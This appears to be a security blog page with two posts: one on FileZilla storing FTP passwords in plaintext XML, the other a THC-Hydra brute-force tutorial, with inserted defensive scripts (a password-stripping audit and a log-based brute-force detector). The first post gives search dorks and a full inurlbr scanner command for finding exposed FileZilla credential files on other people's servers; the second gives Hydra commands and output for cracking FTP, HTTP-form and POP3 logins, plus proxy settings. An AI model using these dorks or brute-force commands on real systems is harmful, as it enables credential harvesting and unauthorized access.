
Sunday, 2 August 2015

Accessing sensitive FileZilla data

FileZilla FTP Passwords now Stored in Plaintext.


It's an old FileZilla vulnerability, but we can still find servers with this security hole. The weakness gives access to sensitive files on the server containing FTP usernames and passwords.

FileZilla versions around 3.0.9.2 and later (and possibly older ones) store all FTP connection data in .xml files in plain text.

The following files are what you need to know about:

filezilla.xml – Stores the most recent server info, including the password in plaintext.
recentservers.xml – Stores all recent server info, including passwords in plaintext.
sitemanager.xml – Stores all saved sites' server info, including passwords in plaintext.

These files can usually be found in the following directories:
Windows XP/2K: "C:\Documents and Settings\username\Application Data\FileZilla"
Windows Vista: "C:\Users\username\AppData\Roaming\FileZilla\"
Linux: "/home/username/.filezilla/"

FileZilla configuration files
FileZilla is a cross-platform application. That’s why it stores its settings in platform-neutral XML files.

sitemanager.xml 
The XML files are readable by anyone who can access them. As you can see, everything is stored in plain text, including the password.
filezilla.xml
The filezilla.xml file follows the same layout as sitemanager.xml; it starts with a <LastServer> element.
Quick connect 
QuickConnect lets you connect to servers without adding them to the Site Manager. When a quick connection is made, it is added to the recentservers.xml file.

Danger?
Yes. Just as you can read these files, malicious applications can read them too, and they can also be read from web servers when they end up under a public directory.
e.g.:
www.target.com.br/folder/{file.xml}
www.target.com.br/microsite/geo243/FileZilla.xml
www.target.com.br/149224/prg/programok/Total%20Commander/FileZilla/recentservers.xml

Other files:
  1. sitemanager.xml
  2. recentservers.xml
  3. filezilla.xml
  4. bookmarks.xml
  5. filters.xml
  6. layout.xml
  7. queue.xml
Looking for vulnerable servers
Now let's use the inurlbr tool to search for sites with this flaw and confirm the information.
Download tool: 
https://github.com/googleinurl/SCANNER-INURLBR

Building the command (using search engines):

SET DORK:
Choose your search dork:

  • "\FileZilla\" ext:xml
  • inurl:"\FileZilla\" & inurl:sitemanager.xml -github -sourceforge
  • inurl:"\FileZilla\" & inurl:recentservers.xml -github -sourceforge
  • inurl:"\FileZilla\" & inurl:filezilla.xml -github -sourceforge
  • inurl:"\FileZilla\" & inurl:bookmarks.xml -github -sourceforge
  • inurl:"\FileZilla\" & inurl:filters.xml -github -sourceforge
  • inurl:"\FileZilla\" & inurl:layout.xml -github -sourceforge
  • inurl:"\FileZilla\" & inurl:queue.xml -github -sourceforge
  • inurl:sitemanager.xml & ext:xml & -github -sourceforge
  • inurl:recentservers.xml & ext:xml & -github -sourceforge
  • inurl:filezilla.xml & ext:xml & -github -sourceforge
  • inurl:bookmarks.xml & ext:xml & -github -sourceforge
  • inurl:filters.xml & ext:xml & -github -sourceforge
  • inurl:layout.xml & ext:xml & -github -sourceforge
  • inurl:queue.xml & ext:xml & -github -sourceforge
  • inurl:"\FileZilla\" & inurl:(sitemanager.xml | recentservers.xml | filezilla.xml | filters.xml | bookmarks.xml | layout.xml | queue.xml) ext:xml -github -sourceforge
--dork 'YOUR_DORK'
- Setting: --dork '"\FileZilla\" ext:xml'

SET FILE OUTPUT:
- Setting: -s filezilla.txt

SET TYPE VALIDATION:
- Setting: -t
   2 The second type validates against the value defined by -a 'VALUE_INSIDE_THE_TARGET'; it also connects to the target using the GET method.

SET STRING VALIDATION:
Specify the string that will be searched for in the target:
   Example: -a {string}
   Usage:    -a '<title>hello world</title>'
   If the specified value is found in the target, it is considered vulnerable.
Setting:     -a '<FileZilla3>'
Every FileZilla file has a root tag called <FileZilla3>. It is through this tag that we will validate.
Ex:


Full command - using search engines:
php inurlbr.php --dork '"\FileZilla\" ext:xml' -s filezilla.txt -t 2 -a '<FileZilla3>'

OR SCANNER DORKING-FILE:
php inurlbr.php --dork-file dorks.txt -s filezilla.txt -t 2 -a '<FileZilla3>'

OUTPUT PRINT:




Using FileZilla the safe way

FileZilla is a great FTP client and I use it myself. But since it doesn’t protect your FTP credentials, you should protect them yourselves. Here is what you can do:

1. Don’t use the “Normal” logon type. There are the “Ask for password” and the “Interactive” types that won’t save your passwords on disk. So malware simply won’t be able to get enough information from FileZilla configuration files to hack your sites.

Pros
Malware cannot steal your FTP credential from configuration files.

Cons
You’ll have to enter your password every time you connect to your site.
It won’t save you from more sophisticated spyware such as keyloggers and traffic sniffers. But I hope this sort of trojan can be better detected by your antivirus tools since they need to hook known system functions. To protect yourself from traffic sniffers, always use SFTP instead of FTP (if possible).

2. Hosts trick. If you manage multiple web sites, interactive logon types may be really inconvenient. There is a trick that can let you use the “Normal” logon type in a more secure manner. You should create aliases of your sites’ addresses in the “hosts” file (on Windows, you can find it in C:\WINDOWS\system32\drivers\etc\).

For example you have a site “example.com” with an IP-address "208.xxx.188.166".
To create an alias you need to add the following line into the hosts file:

208.xxx.188.166         my_example

"my_example" will work the same way as “example.com” when you use it on your computer.
However, on other computers it won’t make any sense. Now use this alias in FTP connection settings instead of “example.com”.
If hackers manage to steal your FTP credentials, all they’ll have will be: (host: my_example, user: unmask, password: parasites) – the username/password pair is valid, but the host name doesn’t make any sense to them. It’s like having a key and not knowing where the door is.

Pros
Once you have added new aliases to the hosts file and to FileZilla Site Manager, you can enjoy the ease of one-click connections.
Cons

This trick will only work as long as malware steals FTP credentials from configuration files verbatim (and I have proof that at least some malware steals the data verbatim). If they only add a simple check that converts host names to IP-addresses before sending the credentials to their central database, the trick will be useless. This trick is better than no protection at all, but you should not count on it.
You’ll need to update the hosts file if IP-addresses change.

3. Public Key Authentication. If your hosting plan includes SSH (secure shell), you can use FileZilla in SFTP mode. One of the convenient SSH features is public key authentication. And FileZilla supports this type of authorization (I didn’t use it myself, but at least have seen the UI in the “Settings” dialog). FileZilla recognizes PuTTY’s Pageant, so the configuration should be easy if you already use PuTTY for SSH.

Pros
Secure one-click connections.

Cons

This authentication method will only work if your hosting plan includes SSH/SFTP. Unfortunately, this option is rarely included in shared hosting plans.
Creating the keys and configuring FileZilla to use them is not a trivial process.
You might still have to enter a pass phrase when adding keys to the Pageant.
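An added audit script, not from this post or from the FileZilla project, that ties the file layout described earlier (a <FileZilla3> root with <Server> entries carrying <Host>, <User>, <Pass> and <Logontype>) to recommendation 1: it lists which Site Manager entries keep a password on disk, without ever printing the password, and rewrites those entries to the "Ask for password" logon type. The Logontype numbering (1 = Normal, 2 = Ask for password) and the sample file are assumptions constructed here.

```python
"""Audit FileZilla's sitemanager.xml for saved plaintext passwords.

Added example (not from the post or the FileZilla project). It assumes the
layout described above (<FileZilla3> root, <Servers>/<Server> entries with
<Host>, <User>, <Pass>, <Logontype>) and FileZilla's logon type numbering,
assumed here as 1 = Normal (password saved) and 2 = Ask for password.
"""
import xml.etree.ElementTree as ET

LOGONTYPE_NORMAL = "1"   # assumed: "Normal" logon, password kept on disk
LOGONTYPE_ASK = "2"      # assumed: "Ask for password", nothing stored

# Constructed sample in the sitemanager.xml layout; not a real config.
SAMPLE_SITEMANAGER = """<FileZilla3>
  <Servers>
    <Server>
      <Host>ftp.example.com</Host>
      <User>webadmin</User>
      <Pass>hunter2</Pass>
      <Logontype>1</Logontype>
      <Name>Example site</Name>
    </Server>
    <Server>
      <Host>sftp.example.org</Host>
      <User>deploy</User>
      <Logontype>2</Logontype>
      <Name>Example org (ask)</Name>
    </Server>
  </Servers>
</FileZilla3>
"""


def stored_credential_entries(xml_text):
    """Return (name, host, user) for each entry that keeps a password.

    The password value is never returned: the audit only needs to know
    that a site stores one, so the report can be shared without leaking it.
    """
    root = ET.fromstring(xml_text)
    if root.tag != "FileZilla3":
        raise ValueError("not a FileZilla3 configuration file")
    found = []
    for server in root.iter("Server"):
        if (server.findtext("Logontype", "0") == LOGONTYPE_NORMAL
                and server.find("Pass") is not None):
            found.append((server.findtext("Name", ""),
                          server.findtext("Host", ""),
                          server.findtext("User", "")))
    return found


def strip_stored_passwords(xml_text):
    """Switch Normal-logon entries to 'Ask for password' and drop <Pass>.

    Returns (rewritten_xml, entries_changed): recommendation 1 above,
    applied to an existing file rather than site by site in the UI.
    """
    root = ET.fromstring(xml_text)
    changed = 0
    for server in root.iter("Server"):
        logontype, password = server.find("Logontype"), server.find("Pass")
        if (logontype is not None and logontype.text == LOGONTYPE_NORMAL
                and password is not None):
            server.remove(password)
            logontype.text = LOGONTYPE_ASK
            changed += 1
    return ET.tostring(root, encoding="unicode"), changed


if __name__ == "__main__":
    for name, host, user in stored_credential_entries(SAMPLE_SITEMANAGER):
        print(f"saved password: {name!r} -> {user}@{host}")
    cleaned, n = strip_stored_passwords(SAMPLE_SITEMANAGER)
    print(f"{n} entries switched to 'Ask for password'")
```

To run it against a real install, read the file from the directory listed above for your platform and write the rewritten XML back only after backing up the original.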
Other FTP programs

In this article I reviewed FileZilla only because it’s a popular FTP client that I have on my computer and it was very easy to demonstrate how little it does to protect users’ FTP credentials. However, the same concerns apply to all other programs that have FTP functions: classical FTP clients, web page editors, file managers. Popular applications like DreamWeaver, CuteFTP, Total Commander, etc. account for the majority of FTP credential leaks.

Solution Source: http://blog.unmaskparasites.com/2009/09/01/beware-filezilla-doesnt-protect-your-ftp-passwords/

References:
http://seclists.org/fulldisclosure/2008/Apr/508
http://blog.unmaskparasites.com/2009/09/01/beware-filezilla-doesnt-protect-your-ftp-passwords/
http://bl0wj0bb3r.blogspot.com.br/2015/08/d3lphi-filezilla-password-stealer.html
http://unsharptech.com/2008/05/20/filezilla-ftp-passwords-stored-in-plaintext/

Sunday, 15 September 2013

BASIC THC-HYDRA TUTORIAL [PT-BR]

 _   _               _               _           
| |_| |__   ___     | |__  _   _  __| |_ __ __ _ 
| __| '_ \ / __|____| '_ \| | | |/ _` | '__/ _` |
| |_| | | | (_|_____| | | | |_| | (_| | | | (_| |
 \__|_| |_|\___|    |_| |_|\__, |\__,_|_|  \__,_|
                           |___/    BASIC THC-HYDRA TUTORIAL [PT-BR]


_________________________________________________________________________________
- By: MDH3LL
- Contact: [email protected]
- Date: 10/04/2010
_________________________________________________________________________________


INDEX:
_________________________________________________________________________________
-0x00 - Installing THC-HYDRA (on Windows XP).
-0x01 - Running.
-0x02 - Options.
-0x03 - Examples{
 -- Example (1) FTP
 -- Example (2) http-head
 -- Example (3) http-post-form
 -- Example (4) POP3
-0x04 - Proxy.
_________________________________________________________________________________

* THC-Hydra: open source / multi-platform.
* Developed by a German group called "The Hacker's Choice" (THC).
* The program can be downloaded free of charge from the project's official site: http://freeworld.thc.org/thc-hydra/

Hydra uses a BRUTE FORCE mechanism (exhaustive search):
this kind of attack consists of making the program work exhaustively, trying combinations of
passwords and usernames until it reaches its obvious goal.

Protocols currently supported in version 5.4:
TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC,
RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS,
ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable
=================================================================================
[0x00] Installing THC-HYDRA (on Windows XP):
=================================================================================
The first step is to download the Win32/Cygwin build of the program from the official site, unpack it and run it.

-> Create an environment variable at:
Control Panel > System > Advanced tab > Environment Variables, adding the path to Path.
example: C:\hydra-5.4-win;

=================================================================================
[0x01] Running:
=================================================================================
Run 'hydra' at the command prompt to start the program.

/////////////////////////////////////////////////////////////////////////////////
C:\Documents and Settings\user\Desktop>hydra
Hydra v5.4 [http://www.thc.org] (c) 2006 by van Hauser / THC 

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
 [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
 server service [OPT]

Options:
  -R        restore a previous aborted/crashed session
  -S        connect via SSL
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE try password PASS, or load several passwords from FILE
  -e ns     additional checks, "n" for null password, "s" try login as pass
  -C FILE   colon seperated "login:pass" format, instead of -L/-P options
  -M FILE   server list for parallel attacks, one entry per line
  -o FILE   write found login/password pairs to FILE instead of stdout
  -f        exit after the first found login/password pair (per host if -M)
  -t TASKS  run TASKS number of connects in parallel (default: 16)
  -w TIME   defines the max wait time in seconds for responses (default: 30)
  -v / -V   verbose mode / show login+pass combination for each attempt
  server    the target server (use either this OR the -M option)
  service   the service to crack. Supported protocols: telnet ftp pop3[-ntlm]
imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco
cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5
rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere
teamspeak sip vmauthd
  OPT       some service modules need special input (see README!)

Use HYDRA_PROXY_HTTP/HYDRA_PROXY_CONNECT and HYDRA_PROXY_AUTH env for a proxy.
Hydra is a tool to guess/crack valid login/password pairs - use allowed only
for legal purposes! If used commercially, tool name, version and web address
must be mentioned in the report. Find the newest version at http://www.thc.org
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

We can see above that, when run, it shows information such as the version, the usage syntax and
the options, each followed by a comment.

=================================================================================
[0x02] Options:
=================================================================================

 -R Restores an aborted/crashed session.
 -S Secure connection over SSL, if needed.
 -s Specifies which port hydra will connect to.
 -l Name|login of the victim.
 -L Loads a list of victim names|logins. (1 per line)
 -p Specifies a single password.
 -P Loads a list of passwords. (1 per line)
 -e ns additional 'n' tries a blank password || additional 's' tries the user as the password.
 -C Used to load a file containing user:password. The user:password format is equivalent to -L/-P.
 -M Loads a list of target servers. (1 per line)
 -o Saves the passwords found into the file you specify.
 -f Makes the program stop when the password||user is found.
 -t Limits the number of requests at a time. (default: 16)
 -w Sets the maximum time in seconds to wait for a response from the server. (default: 30s)
 -v / -V Verbose mode. 'V' shows every attempt.

Server: target server.
Examples:
 127.0.0.1
 localhost
 pop.gmail.com
 pop.mail.yahoo.com.br 
 pop3.live.com 

Service: protocol||service that will be called|used.
Examples:
 pop3
 ftp
 smtp
 vnc 
 imap
 http-head
 http-post-form

=================================================================================
[0x03] Examples:
=================================================================================
I will put into practice the options already explained in section [0x02] of this tutorial.

Example (1) FTP
=================================================================================
Syntax:
---------------------------------------------------------------------------------
hydra -l root -P pass.txt -s 21 localhost ftp
---------------------------------------------------------------------------------

Output:
/////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-08-17 21:23:57
[DATA] 16 tasks, 1 servers, 23 login tries (l:1/p:23), ~1 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 127.0.0.1   login: root   password: chaw123
[STATUS] attack finished for localhost (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2009-08-17 21:24:34
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

*[21][ftp] host: 127.0.0.1   login: root   password: chaw123 -> This output shows that the password chaw123 was found,
belonging to the user root.
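On the defending side, the burst in the output above (16 tasks, 23 login attempts from one client in well under a minute) is easy to spot in the FTP server's own log. Added example, not part of the tutorial: a small detector over constructed vsftpd-style log lines that flags a client exceeding a failure threshold inside a sliding window, and a successful login that follows such a burst. The log format, the threshold and the sample lines are assumptions made here.

```python
"""Flag FTP login brute-force bursts in vsftpd-style log lines.

Added example, not part of the original tutorial. The log lines are
constructed in vsftpd's log format (timestamp, pid, user, OK/FAIL LOGIN,
client IP); the sample mimics Example (1): 23 attempts against one user
from one client in under a minute, the last of which succeeds.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# e.g. Mon Aug 17 21:23:57 2009 [pid 4101] [root] FAIL LOGIN: Client "127.0.0.1"
LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"'
)


def _line(sec, pid, user, result, ip):
    """Build one constructed vsftpd log line, sec seconds after 21:23:00."""
    return (f'Mon Aug 17 21:{23 + sec // 60:02d}:{sec % 60:02d} 2009 '
            f'[pid {pid}] [{user}] {result} LOGIN: Client "{ip}"')


# 22 failures then a success from 127.0.0.1, plus an unrelated client.
SAMPLE_LOG = (
    [_line(57 + i, 4101 + i, "root", "FAIL", "127.0.0.1") for i in range(22)]
    + [_line(79, 4123, "root", "OK", "127.0.0.1"),
       _line(90, 4130, "alice", "OK", "10.0.0.5"),
       _line(91, 4131, "alice", "FAIL", "10.0.0.5")]
)


def parse_line(line):
    """Return (timestamp, user, result, ip) or None for non-login lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y")
    return ts, m.group("user"), m.group("result"), m.group("ip")


def detect_bruteforce(lines, max_failures=10, window=timedelta(seconds=60)):
    """Return alerts for clients reaching max_failures FAIL LOGINs inside a
    sliding window, and for a success that follows such a burst."""
    failures = defaultdict(deque)   # ip -> timestamps of recent failures
    users = defaultdict(set)        # ip -> usernames tried
    alerts = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue                # transfer or other non-login line
        ts, user, result, ip = parsed
        recent = failures[ip]
        while recent and ts - recent[0] > window:
            recent.popleft()        # expire failures outside the window
        if result == "FAIL":
            recent.append(ts)
            users[ip].add(user)
            if len(recent) == max_failures:     # alert once per burst
                alerts.append({"kind": "burst", "ip": ip, "at": ts,
                               "failures": len(recent),
                               "users": sorted(users[ip])})
        elif len(recent) >= max_failures:
            # A valid pair right after a burst is exactly what hydra reports.
            alerts.append({"kind": "success_after_burst", "ip": ip,
                           "at": ts, "failures": len(recent), "user": user})
            recent.clear()
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```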


Example (2) http-head
=================================================================================
Syntax:
---------------------------------------------------------------------------------
hydra -L users.txt -P pass.txt -o saida.txt localhost http-head /xampp/
---------------------------------------------------------------------------------

Output:
/////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-01-28 00:40:56
[DATA] 16 tasks, 1 servers, 266 login tries (l:14/p:19), ~16 tries per task
[DATA] attacking service http-head on port 80
[80][www] host: 127.0.0.1   login: root   password: Est2yu
[STATUS] attack finished for localhost (waiting for childs to finish)
select: Bad file descriptor
Hydra (http://www.thc.org) finished at 2010-01-28 00:41:00
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Hydra found user:root||password:Est2yu and was kind enough to save it to the file 'saida.txt'.

The program wrote the following lines inside the file:
---------------------------------------------------------------------------------
# Hydra v5.4 run at 2010-01-27 19:59:59 on localhost http-head (hydra -L users.txt -P
 pass.txt -o saida.txt localhost http-head)
[80][www] host: 127.0.0.1   login: root password: Est2yu
---------------------------------------------------------------------------------
/xampp/ is the path -> http://localhost/xampp/


Example (3) http-post-form
=================================================================================
Syntax:
---------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o saida.txt -t 1 -f 127.0.0.1
 http-post-form "index.php:nome=^USER^&senha=^PASS^:invalido"
---------------------------------------------------------------------------------

Output:
/////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-01-27 23:19:33
[DATA] 1 tasks, 1 servers, 19 login tries (l:1/p:19), ~19 tries per task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 127.0.0.1   login: admin   password: admin
[STATUS] attack finished for 127.0.0.1 (valid pair found)
Hydra (http://www.thc.org) finished at 2010-01-27 23:19:33
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

-> To build this syntax I had to look at the page source >>
---------------------------------------------------------------------------------

---------------------------------------------------------------------------------

 __________________________________________________________
|__Mozilla Firefox___________________________________|-|_|X|
|                                                          |
|                                                          |
|                                                          |
|                                                          |
|           _____________________________________          |
|          |               nome                  |         |
|          |_____________________________________|         |
|           _____________________________________          |
|          |               senha                 |         |
|          |_____________________________________|         |
|                                                          |
|                     ________________                     |
|                    |     Enviar     |                    |
|                    |________________|                    |
|                                                          |
|__________________________________________________________|
|_Concluído________________________________________________|

-> POST index.php nome=^USER^&senha=^PASS^&boo=Enviar
-> Use the 'Live HTTP headers' add-on for Firefox; it will certainly make your life much easier.
-> When I send wrong data, the page returns 'invalido' in the title.
---------------------------------------------------------------------------------
invalido
---------------------------------------------------------------------------------

Template ->
---------------------------------------------------------------------------------
hydra -l [user] -P [password-list] -o saida.txt -t 1 -f [host] http-post-form
"[target]:[variable_name]=^USER^&[variable_name]=^PASS^:[error phrase]"
---------------------------------------------------------------------------------

Complete ->
---------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o saida.txt -t 1 -f 127.0.0.1 http-post-form "index.php:nome=^USER^&senha=^PASS^:invalido"
---------------------------------------------------------------------------------

^USER^ and ^PASS^ are filled in by hydra during the loop it runs, trying password after password.
-> ^USER^ = admin and ^PASS^ = each password from the list in turn.
Another example -> http://localhost/login/login.html
-> Page source code >>
---------------------------------------------------------------------------------

---------------------------------------------------------------------------------

Syntax:
---------------------------------------------------------------------------------
hydra -l admin -P pass.txt localhost http-post-form "/login/login_vai.php:login=^USER^&senha=^PASS^:Senha inválida!"
---------------------------------------------------------------------------------

Output:
/////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-04-11 00:31:02
[DATA] 1 tasks, 1 servers, 11 login tries (l:1/p:11), ~11 tries per task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 127.0.0.1   login: admin   password: teste
[STATUS] attack finished for localhost (valid pair found)
Hydra (http://www.thc.org) finished at 2010-04-11 00:31:07
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\


Example (4) POP3
=================================================================================
Syntax:
---------------------------------------------------------------------------------
hydra -L users.txt -p 123456 -S pop3.xxx.com pop3
---------------------------------------------------------------------------------

Output:
/////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-01-28 00:55:28
[DATA] 9 tasks, 1 servers, 9 login tries (l:9/p:1), ~1 tries per task
[DATA] attacking service pop3 on port 110
[STATUS] attack finished for pop3.xxx.com (waiting for childs to finish)
[110][pop3] host: pop3.xxx.com   login: [email protected] password: 123456
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\


=================================================================================
[0x04] Proxy:
=================================================================================

Web proxy:
---------------------------------------------------------------------------------
HYDRA_PROXY_HTTP="http://123.45.67.89:8080/"
---------------------------------------------------------------------------------

For anything else use: HYDRA_PROXY_CONNECT
---------------------------------------------------------------------------------
HYDRA_PROXY_CONNECT=proxy.anonymizer.com:8000
---------------------------------------------------------------------------------

With authentication:
---------------------------------------------------------------------------------
HYDRA_PROXY_AUTH="nome:senha"
---------------------------------------------------------------------------------